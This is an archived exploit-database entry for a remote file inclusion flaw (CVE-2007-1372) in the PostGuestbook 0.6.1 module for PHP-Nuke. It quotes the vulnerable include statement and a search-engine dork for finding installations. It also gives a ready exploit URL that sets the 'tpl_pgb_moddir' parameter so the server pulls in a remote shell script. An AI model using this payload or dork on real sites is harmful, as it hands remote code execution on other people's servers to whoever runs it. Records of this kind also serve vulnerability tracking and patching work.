PHP-Nuke Module PostGuestbook 0.6.1 - 'tpl_pgb_moddir' Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-03-06 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-36320;CVE-2007-1372 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.compostguestbook_061.zip

# PostGuestbook 0.6.1(tpl_pgb_moddir)Remote File Include Expliot
# D.Script: http://sourceforge.net/projects/postguestbook/
# Dork: "Powered by: PostGuestbook 0.6.1"
# Discovered by GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
# include "$tpl_pgb_moddir/styles/$tpl_style/error.php";
# Exploit:
# [VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=Shell.php?

# milw0rm.com [2007-03-07]